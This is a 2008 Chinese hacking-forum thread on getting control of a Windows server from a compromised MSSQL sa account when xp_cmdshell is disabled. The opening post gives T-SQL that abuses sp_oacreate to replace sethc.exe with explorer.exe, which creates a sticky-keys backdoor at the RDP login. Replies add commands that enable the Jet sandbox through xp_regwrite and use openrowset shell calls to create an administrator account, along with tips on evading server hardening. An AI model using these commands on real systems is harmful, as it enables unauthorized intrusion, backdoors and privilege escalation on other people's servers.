Board logo

标题: [讨论]sa 无xp_cmdshell下取权限又一简单方法 [打印本页]

作者: jjcd    时间: 2008-7-22 09:42     标题: [讨论]sa 无xp_cmdshell下取权限又一简单方法

[讨论]sa 无xp_cmdshell下取权限又一简单方法
文章作者:charley008
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
(很多服务器都把'wscript.shell'给删了。)
看到既然能用sp_oacreate,sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。
上网找了些资料,得到下面方法:
复制文件:
复制内容到剪贴板
代码:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
复制内容到剪贴板
代码:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。

此法随无技术可言,希望对某些人有点用。
PS:高手能否把Shell.Application 这个也调用呢?希望多多指点
帖子16 精华0 积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

ring04h
团队执行官

作者: 阿豪    时间: 2008-7-22 09:42

SA 权限还有两个执行系统指令的方法!
1: 沙盒模式。
2:使用SQLSERVERAGENT的JOB来运行系统命令,请先使用下列语句启动SQLSERVERAGENT:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

详细利用方法google之!
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

charley008
晶莹剔透§烈日灼然
作者: rejions    时间: 2008-7-22 09:42

1: 沙盒模式
好像2003我 试了没成功过
帖子16 精华0 积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

heizihui
晶莹剔透§烈日灼然
作者: pandio    时间: 2008-7-22 09:42

是啊

沙盒我也没成功过~

在webshell下,连接MSSQL,用SYSADMIN帐号,maste库。都没成功!
郁闷!
不知道什么原因



[Microsoft][ODBC SQL Server Driver][SQL Server]无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。

这个提示是什么意思呢?

xpsql70.dll 没了?
帖子5 精华0 积分20 阅读权限40 在线时间6 小时 注册时间2005-12-10 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP

heizihui
晶莹剔透§烈日灼然
作者: dgvios    时间: 2008-7-22 09:42

晕死了~~

又搞了几小时

发现那服务器的人居然把net.exe net1.exe都用CMD.exe替换掉了。真BT啊~~

第3方软件是突破口了~~~


帖子5 精华0 积分20 阅读权限40 在线时间6 小时 注册时间2005-12-10 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

ziv
晶莹剔透§烈日灼然
作者: Hemry    时间: 2008-7-22 09:42

晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。 ?
不能用呢~

我用&把 3句连接起来执行出现这

[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '&' 附近有语法错误。


不能外连,只能在webshell下执行SQL命令呀

怎么写完整?
帖子5 精华0 积分20 阅读权限40 在线时间6 小时 注册时间2005-12-10 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

heizihui
晶莹剔透§烈日灼然
作者: 樱子    时间: 2008-7-22 09:42

SA沙盒从木成功过.

帖子2 精华0 积分20 阅读权限40 性别男 在线时间2 小时 注册时间2007-6-27 最后登录2008-7-17 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuziliu
晶莹剔透§烈日灼然
作者: 小李    时间: 2008-7-22 09:42

首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

呼,成功了一次。

帖子21 精华0 积分70 阅读权限40 在线时间207 小时 注册时间2005-7-3 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

poc
晶莹剔透§烈日灼然
作者: 133832166    时间: 2008-7-22 09:42

TO ring04h
那个使用SQLSERVERAGENT的JOB来运行系统命令
貌似要知道SQL服务器的名字。
用什么方法才能知道呢?

帖子31 精华0 积分90 阅读权限40 性别男 在线时间57 小时 注册时间2007-3-18 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

charley008
晶莹剔透§烈日灼然
作者: wendy    时间: 2008-7-22 09:42

引用:
引用第4楼heizihui于2007-12-07 18:10发表的 :
晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。 ?
不能用呢~

.......
把第一第二句放在一行。不要分开
帖子16 精华0 积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然
作者: shenbi    时间: 2008-7-22 09:42

xxxx.cpp这个错误是不能用沙盘的。cmd被删除或重新分配权限,导致system无执行权限。
方法:重新上传一个cmd用oa调新的cmd执行。路径任意
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

heekey
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2